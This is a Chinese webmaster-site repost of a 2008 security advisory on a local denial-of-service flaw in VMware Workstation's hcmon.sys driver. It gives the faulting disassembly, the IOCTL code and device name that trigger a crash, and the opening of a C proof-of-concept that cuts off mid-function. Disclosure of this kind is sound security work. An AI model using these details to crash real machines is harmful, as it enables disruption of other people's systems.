站长网_站长创业_站长主页_站长之家_易采站长站

会员投稿 投稿指南 站长资讯通告: TGS CMS 0.3.2r2 Remote Code Execution Exploit
搜索:
您的位置: 主页 > 教程 > 电脑安全 > 黑客漏洞 > » 正文

VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnera

来源: 易采站长站
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1 - - Orange Bat advisory - Name : VMWare Workstation (hcmon.sys 6.0.0.45731)
Class : DoS
Published : 2008-08-17
Credit : g_ (g_ # orange-bat # com) - - Details - Fails to sanitize pointers sent from usermode with METHOD_NEITHER. hcmon.sys: .text:00011606 loc_11606: .text:00011606 mov eax, [ebp SystemBuffer]
.text:00011609 mov [ebp SystemBuffer2], eax
.text:0001160C mov ecx, [ebp SystemBuffer2]
.text:0001160F mov edx, [ecx 0Ch] <---- BUGCHECK
.text:00011612 cmp edx, [ebp var_20]
.text:00011615 jnz short loc_11629
.text:00011617 cmp [ebp NumberOfBytes], 70h
.text:0001161B jb short loc_11629
.text:0001161D mov eax, [ebp SystemBuffer2]
.text:00011620 cmp dword ptr [eax 8], 7FFBh
.text:00011627 jbe short loc_11638 This code can be reached by sending 0x8101232B IOCTL to \\.\hcmon
device. - - Proof of concept - #include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>
void TextError(LPTSTR lpszFunction)
{
// Retrieve the system error message for the last-error code LPVOID lpMsgBuf;
LPVOID lpDisplayBuf;
DWORD dw = GetLastError(); FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0, NULL ); // Display the error message and exit the process lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,
(lstrlen((LPCTSTR)lpMsgBuf) lstrlen((LPCTSTR)lpszFunction) 40) \
*sizeof(TCHAR));
sprintf((LPTSTR)lpDisplayBuf,
TEXT("%s failed with error %d: %s"),
lpszFunction, dw, lpMsgBuf);
//MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK); printf(lpDisplayBuf); LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
}
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, \
DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
HANDLE hDevice; // handle to the drive to be examined
BOOL bResult; // results flag
DWORD junk; // discard results
IO_STATUS_BLOCK IoStatusBlock; hDevice = CreateFile(DeviceName,
0, // no access to the drive
FILE_SHARE_READ | // share mode
FILE_SHARE_WRITE,
NULL, // default security attributes
Tags:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
易采站长站 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助 -